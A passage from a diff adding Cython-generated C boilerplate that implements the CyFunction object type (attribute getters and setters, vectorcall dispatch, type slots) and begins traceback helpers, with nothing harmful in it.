__Pyx_Py_XDECREF_SET(op->func_doc, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_name(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_name == NULL)) { +#if PY_MAJOR_VERSION >= 3 + op->func_name = PyUnicode_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#else + op->func_name = PyString_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#endif + if (unlikely(op->func_name == NULL)) + return NULL; + } + Py_INCREF(op->func_name); + return op->func_name; +} +static int +__Pyx_CyFunction_set_name(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__name__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_name, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_qualname(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_qualname); + return op->func_qualname; +} +static int +__Pyx_CyFunction_set_qualname(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__qualname__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_qualname, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_dict(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_dict == NULL)) { + op->func_dict = PyDict_New(); + if (unlikely(op->func_dict == NULL)) + return NULL; + } + Py_INCREF(op->func_dict); + return op->func_dict; +} +static int +__Pyx_CyFunction_set_dict(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(value == NULL)) { + PyErr_SetString(PyExc_TypeError, + "function's dictionary may not be deleted"); + return -1; + } + if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "setting function's dictionary to a non-dict"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_dict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_globals(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_globals); + return op->func_globals; +} +static PyObject * +__Pyx_CyFunction_get_closure(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(op); + CYTHON_UNUSED_VAR(context); + Py_INCREF(Py_None); + return Py_None; +} +static PyObject * +__Pyx_CyFunction_get_code(__pyx_CyFunctionObject *op, void *context) +{ + PyObject* result = (op->func_code) ? op->func_code : Py_None; + CYTHON_UNUSED_VAR(context); + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_init_defaults(__pyx_CyFunctionObject *op) { + int result = 0; + PyObject *res = op->defaults_getter((PyObject *) op); + if (unlikely(!res)) + return -1; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + op->defaults_tuple = PyTuple_GET_ITEM(res, 0); + Py_INCREF(op->defaults_tuple); + op->defaults_kwdict = PyTuple_GET_ITEM(res, 1); + Py_INCREF(op->defaults_kwdict); + #else + op->defaults_tuple = PySequence_ITEM(res, 0); + if (unlikely(!op->defaults_tuple)) result = -1; + else { + op->defaults_kwdict = PySequence_ITEM(res, 1); + if (unlikely(!op->defaults_kwdict)) result = -1; + } + #endif + Py_DECREF(res); + return result; +} +static int +__Pyx_CyFunction_set_defaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyTuple_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__defaults__ must be set to a tuple object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__defaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_tuple, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_defaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_tuple; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_tuple; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_kwdefaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__kwdefaults__ must be set to a dict object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__kwdefaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_kwdict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_kwdefaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_kwdict; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_kwdict; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_annotations(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value || value == Py_None) { + value = NULL; + } else if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__annotations__ must be set to a dict object"); + return -1; + } + Py_XINCREF(value); + __Pyx_Py_XDECREF_SET(op->func_annotations, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_annotations(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->func_annotations; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + result = PyDict_New(); + if (unlikely(!result)) return NULL; + op->func_annotations = result; + } + Py_INCREF(result); + return result; +} +static PyObject * +__Pyx_CyFunction_get_is_coroutine(__pyx_CyFunctionObject *op, void *context) { + int is_coroutine; + CYTHON_UNUSED_VAR(context); + if (op->func_is_coroutine) { + return __Pyx_NewRef(op->func_is_coroutine); + } + is_coroutine = op->flags & __Pyx_CYFUNCTION_COROUTINE; +#if PY_VERSION_HEX >= 0x03050000 + if (is_coroutine) { + PyObject *module, *fromlist, *marker = __pyx_n_s_is_coroutine; + fromlist = PyList_New(1); + if (unlikely(!fromlist)) return NULL; + Py_INCREF(marker); + PyList_SET_ITEM(fromlist, 0, marker); + module = PyImport_ImportModuleLevelObject(__pyx_n_s_asyncio_coroutines, NULL, NULL, fromlist, 0); + Py_DECREF(fromlist); + if (unlikely(!module)) goto ignore; + op->func_is_coroutine = __Pyx_PyObject_GetAttrStr(module, marker); + Py_DECREF(module); + if (likely(op->func_is_coroutine)) { + return __Pyx_NewRef(op->func_is_coroutine); + } +ignore: + PyErr_Clear(); + } +#endif + op->func_is_coroutine = __Pyx_PyBool_FromLong(is_coroutine); + return __Pyx_NewRef(op->func_is_coroutine); +} +static PyGetSetDef __pyx_CyFunction_getsets[] = { + {(char *) "func_doc", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "__doc__", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "func_name", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__name__", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__qualname__", (getter)__Pyx_CyFunction_get_qualname, (setter)__Pyx_CyFunction_set_qualname, 0, 0}, + {(char *) "func_dict", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "__dict__", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "func_globals", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "__globals__", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "func_closure", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "__closure__", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "func_code", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "__code__", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "func_defaults", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__defaults__", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__kwdefaults__", (getter)__Pyx_CyFunction_get_kwdefaults, (setter)__Pyx_CyFunction_set_kwdefaults, 0, 0}, + {(char *) "__annotations__", (getter)__Pyx_CyFunction_get_annotations, (setter)__Pyx_CyFunction_set_annotations, 0, 0}, + {(char *) "_is_coroutine", (getter)__Pyx_CyFunction_get_is_coroutine, 0, 0, 0}, + {0, 0, 0, 0, 0} +}; +static PyMemberDef __pyx_CyFunction_members[] = { + {(char *) "__module__", T_OBJECT, offsetof(PyCFunctionObject, m_module), 0, 0}, +#if CYTHON_USE_TYPE_SPECS + {(char *) "__dictoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_dict), READONLY, 0}, +#if CYTHON_METH_FASTCALL +#if CYTHON_BACKPORT_VECTORCALL + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_vectorcall), READONLY, 0}, +#else + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(PyCFunctionObject, vectorcall), READONLY, 0}, +#endif +#endif +#if PY_VERSION_HEX < 0x030500A0 + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_weakreflist), READONLY, 0}, +#else + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(PyCFunctionObject, m_weakreflist), READONLY, 0}, +#endif +#endif + {0, 0, 0, 0, 0} +}; +static PyObject * +__Pyx_CyFunction_reduce(__pyx_CyFunctionObject *m, PyObject *args) +{ + CYTHON_UNUSED_VAR(args); +#if PY_MAJOR_VERSION >= 3 + Py_INCREF(m->func_qualname); + return m->func_qualname; +#else + return PyString_FromString(((PyCFunctionObject*)m)->m_ml->ml_name); +#endif +} +static PyMethodDef __pyx_CyFunction_methods[] = { + {"__reduce__", (PyCFunction)__Pyx_CyFunction_reduce, METH_VARARGS, 0}, + {0, 0, 0, 0} +}; +#if PY_VERSION_HEX < 0x030500A0 +#define __Pyx_CyFunction_weakreflist(cyfunc) ((cyfunc)->func_weakreflist) +#else +#define __Pyx_CyFunction_weakreflist(cyfunc) (((PyCFunctionObject*)cyfunc)->m_weakreflist) +#endif +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject *op, PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyCFunctionObject *cf = (PyCFunctionObject*) op; + if (unlikely(op == NULL)) + return NULL; + op->flags = flags; + __Pyx_CyFunction_weakreflist(op) = NULL; + cf->m_ml = ml; + cf->m_self = (PyObject *) op; + Py_XINCREF(closure); + op->func_closure = closure; + Py_XINCREF(module); + cf->m_module = module; + op->func_dict = NULL; + op->func_name = NULL; + Py_INCREF(qualname); + op->func_qualname = qualname; + op->func_doc = NULL; +#if PY_VERSION_HEX < 0x030900B1 + op->func_classobj = NULL; +#else + ((PyCMethodObject*)op)->mm_class = NULL; +#endif + op->func_globals = globals; + Py_INCREF(op->func_globals); + Py_XINCREF(code); + op->func_code = code; + op->defaults_pyobjects = 0; + op->defaults_size = 0; + op->defaults = NULL; + op->defaults_tuple = NULL; + op->defaults_kwdict = NULL; + op->defaults_getter = NULL; + op->func_annotations = NULL; + op->func_is_coroutine = NULL; +#if CYTHON_METH_FASTCALL + switch (ml->ml_flags & (METH_VARARGS | METH_FASTCALL | METH_NOARGS | METH_O | METH_KEYWORDS | METH_METHOD)) { + case METH_NOARGS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_NOARGS; + break; + case METH_O: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_O; + break; + case METH_METHOD | METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD; + break; + case METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS; + break; + case METH_VARARGS | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = NULL; + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + Py_DECREF(op); + return NULL; + } +#endif + return (PyObject *) op; +} +static int +__Pyx_CyFunction_clear(__pyx_CyFunctionObject *m) +{ + Py_CLEAR(m->func_closure); + Py_CLEAR(((PyCFunctionObject*)m)->m_module); + Py_CLEAR(m->func_dict); + Py_CLEAR(m->func_name); + Py_CLEAR(m->func_qualname); + Py_CLEAR(m->func_doc); + Py_CLEAR(m->func_globals); + Py_CLEAR(m->func_code); +#if PY_VERSION_HEX < 0x030900B1 + Py_CLEAR(__Pyx_CyFunction_GetClassObj(m)); +#else + { + PyObject *cls = (PyObject*) ((PyCMethodObject *) (m))->mm_class; + ((PyCMethodObject *) (m))->mm_class = NULL; + Py_XDECREF(cls); + } +#endif + Py_CLEAR(m->defaults_tuple); + Py_CLEAR(m->defaults_kwdict); + Py_CLEAR(m->func_annotations); + Py_CLEAR(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_XDECREF(pydefaults[i]); + PyObject_Free(m->defaults); + m->defaults = NULL; + } + return 0; +} +static void __Pyx__CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + if (__Pyx_CyFunction_weakreflist(m) != NULL) + PyObject_ClearWeakRefs((PyObject *) m); + __Pyx_CyFunction_clear(m); + __Pyx_PyHeapTypeObject_GC_Del(m); +} +static void __Pyx_CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + PyObject_GC_UnTrack(m); + __Pyx__CyFunction_dealloc(m); +} +static int __Pyx_CyFunction_traverse(__pyx_CyFunctionObject *m, visitproc visit, void *arg) +{ + Py_VISIT(m->func_closure); + Py_VISIT(((PyCFunctionObject*)m)->m_module); + Py_VISIT(m->func_dict); + Py_VISIT(m->func_name); + Py_VISIT(m->func_qualname); + Py_VISIT(m->func_doc); + Py_VISIT(m->func_globals); + Py_VISIT(m->func_code); + Py_VISIT(__Pyx_CyFunction_GetClassObj(m)); + Py_VISIT(m->defaults_tuple); + Py_VISIT(m->defaults_kwdict); + Py_VISIT(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_VISIT(pydefaults[i]); + } + return 0; +} +static PyObject* +__Pyx_CyFunction_repr(__pyx_CyFunctionObject *op) +{ +#if PY_MAJOR_VERSION >= 3 + return PyUnicode_FromFormat("", + op->func_qualname, (void *)op); +#else + return PyString_FromFormat("", + PyString_AsString(op->func_qualname), (void *)op); +#endif +} +static PyObject * __Pyx_CyFunction_CallMethod(PyObject *func, PyObject *self, PyObject *arg, PyObject *kw) { + PyCFunctionObject* f = (PyCFunctionObject*)func; + PyCFunction meth = f->m_ml->ml_meth; + Py_ssize_t size; + switch (f->m_ml->ml_flags & (METH_VARARGS | METH_KEYWORDS | METH_NOARGS | METH_O)) { + case METH_VARARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) + return (*meth)(self, arg); + break; + case METH_VARARGS | METH_KEYWORDS: + return (*(PyCFunctionWithKeywords)(void*)meth)(self, arg, kw); + case METH_NOARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 0)) + return (*meth)(self, NULL); + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + case METH_O: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 1)) { + PyObject *result, *arg0; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + arg0 = PyTuple_GET_ITEM(arg, 0); + #else + arg0 = PySequence_ITEM(arg, 0); if (unlikely(!arg0)) return NULL; + #endif + result = (*meth)(self, arg0); + #if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(arg0); + #endif + return result; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + return NULL; + } + PyErr_Format(PyExc_TypeError, "%.200s() takes no keyword arguments", + f->m_ml->ml_name); + return NULL; +} +static CYTHON_INLINE PyObject *__Pyx_CyFunction_Call(PyObject *func, PyObject *arg, PyObject *kw) { + return __Pyx_CyFunction_CallMethod(func, ((PyCFunctionObject*)func)->m_self, arg, kw); +} +static PyObject *__Pyx_CyFunction_CallAsMethod(PyObject *func, PyObject *args, PyObject *kw) { + PyObject *result; + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *) func; +#if CYTHON_METH_FASTCALL + __pyx_vectorcallfunc vc = __Pyx_CyFunction_func_vectorcall(cyfunc); + if (vc) { +#if CYTHON_ASSUME_SAFE_MACROS + return __Pyx_PyVectorcall_FastCallDict(func, vc, &PyTuple_GET_ITEM(args, 0), (size_t)PyTuple_GET_SIZE(args), kw); +#else + (void) &__Pyx_PyVectorcall_FastCallDict; + return PyVectorcall_Call(func, args, kw); +#endif + } +#endif + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + Py_ssize_t argc; + PyObject *new_args; + PyObject *self; + argc = PyTuple_GET_SIZE(args); + new_args = PyTuple_GetSlice(args, 1, argc); + if (unlikely(!new_args)) + return NULL; + self = PyTuple_GetItem(args, 0); + if (unlikely(!self)) { + Py_DECREF(new_args); +#if PY_MAJOR_VERSION > 2 + PyErr_Format(PyExc_TypeError, + "unbound method %.200S() needs an argument", + cyfunc->func_qualname); +#else + PyErr_SetString(PyExc_TypeError, + "unbound method needs an argument"); +#endif + return NULL; + } + result = __Pyx_CyFunction_CallMethod(func, self, new_args, kw); + Py_DECREF(new_args); + } else { + result = __Pyx_CyFunction_Call(func, args, kw); + } + return result; +} +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE int __Pyx_CyFunction_Vectorcall_CheckArgs(__pyx_CyFunctionObject *cyfunc, Py_ssize_t nargs, PyObject *kwnames) +{ + int ret = 0; + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + if (unlikely(nargs < 1)) { + PyErr_Format(PyExc_TypeError, "%.200s() needs an argument", + ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + ret = 1; + } + if (unlikely(kwnames) && unlikely(PyTuple_GET_SIZE(kwnames))) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no keyword arguments", ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + return ret; +} +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 0)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, NULL); +} +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 1)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, args[0]); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((_PyCFunctionFastWithKeywords)(void(*)(void))def->ml_meth)(self, args, nargs, kwnames); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; + PyTypeObject *cls = (PyTypeObject *) __Pyx_CyFunction_GetClassObj(cyfunc); +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((__Pyx_PyCMethod)(void(*)(void))def->ml_meth)(self, cls, args, (size_t)nargs, kwnames); +} +#endif +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_CyFunctionType_slots[] = { + {Py_tp_dealloc, (void *)__Pyx_CyFunction_dealloc}, + {Py_tp_repr, (void *)__Pyx_CyFunction_repr}, + {Py_tp_call, (void *)__Pyx_CyFunction_CallAsMethod}, + {Py_tp_traverse, (void *)__Pyx_CyFunction_traverse}, + {Py_tp_clear, (void *)__Pyx_CyFunction_clear}, + {Py_tp_methods, (void *)__pyx_CyFunction_methods}, + {Py_tp_members, (void *)__pyx_CyFunction_members}, + {Py_tp_getset, (void *)__pyx_CyFunction_getsets}, + {Py_tp_descr_get, (void *)__Pyx_PyMethod_New}, + {0, 0}, +}; +static PyType_Spec __pyx_CyFunctionType_spec = { + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#if (defined(_Py_TPFLAGS_HAVE_VECTORCALL) && CYTHON_METH_FASTCALL) + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + __pyx_CyFunctionType_slots +}; +#else +static PyTypeObject __pyx_CyFunctionType_type = { + PyVarObject_HEAD_INIT(0, 0) + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, + (destructor) __Pyx_CyFunction_dealloc, +#if !CYTHON_METH_FASTCALL + 0, +#elif CYTHON_BACKPORT_VECTORCALL + (printfunc)offsetof(__pyx_CyFunctionObject, func_vectorcall), +#else + offsetof(PyCFunctionObject, vectorcall), +#endif + 0, + 0, +#if PY_MAJOR_VERSION < 3 + 0, +#else + 0, +#endif + (reprfunc) __Pyx_CyFunction_repr, + 0, + 0, + 0, + 0, + __Pyx_CyFunction_CallAsMethod, + 0, + 0, + 0, + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#ifdef _Py_TPFLAGS_HAVE_VECTORCALL + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + 0, + (traverseproc) __Pyx_CyFunction_traverse, + (inquiry) __Pyx_CyFunction_clear, + 0, +#if PY_VERSION_HEX < 0x030500A0 + offsetof(__pyx_CyFunctionObject, func_weakreflist), +#else + offsetof(PyCFunctionObject, m_weakreflist), +#endif + 0, + 0, + __pyx_CyFunction_methods, + __pyx_CyFunction_members, + __pyx_CyFunction_getsets, + 0, + 0, + __Pyx_PyMethod_New, + 0, + offsetof(__pyx_CyFunctionObject, func_dict), + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, +#if PY_VERSION_HEX >= 0x030400a1 + 0, +#endif +#if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, +#endif +#if __PYX_NEED_TP_PRINT_SLOT + 0, +#endif +#if PY_VERSION_HEX >= 0x030C0000 + 0, +#endif +#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, +#endif +}; +#endif +static int __pyx_CyFunction_init(PyObject *module) { +#if CYTHON_USE_TYPE_SPECS + __pyx_CyFunctionType = __Pyx_FetchCommonTypeFromSpec(module, &__pyx_CyFunctionType_spec, NULL); +#else + CYTHON_UNUSED_VAR(module); + __pyx_CyFunctionType = __Pyx_FetchCommonType(&__pyx_CyFunctionType_type); +#endif + if (unlikely(__pyx_CyFunctionType == NULL)) { + return -1; + } + return 0; +} +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *func, size_t size, int pyobjects) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults = PyObject_Malloc(size); + if (unlikely(!m->defaults)) + return PyErr_NoMemory(); + memset(m->defaults, 0, size); + m->defaults_pyobjects = pyobjects; + m->defaults_size = size; + return m->defaults; +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *func, PyObject *tuple) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_tuple = tuple; + Py_INCREF(tuple); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_kwdict = dict; + Py_INCREF(dict); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->func_annotations = dict; + Py_INCREF(dict); +} + +/* CythonFunction */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyObject *op = __Pyx_CyFunction_Init( + PyObject_GC_New(__pyx_CyFunctionObject, __pyx_CyFunctionType), + ml, flags, qualname, closure, module, globals, code + ); + if (likely(op)) { + PyObject_GC_Track(op); + } + return op; +} + +/* CLineInTraceback */ +#ifndef CYTHON_CLINE_IN_TRACEBACK +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line) { + PyObject *use_cline; + PyObject *ptype, *pvalue, *ptraceback; +#if CYTHON_COMPILING_IN_CPYTHON + PyObject **cython_runtime_dict; +#endif + CYTHON_MAYBE_UNUSED_VAR(tstate); + if (unlikely(!__pyx_cython_runtime)) { + return c_line; + } + __Pyx_ErrFetchInState(tstate, 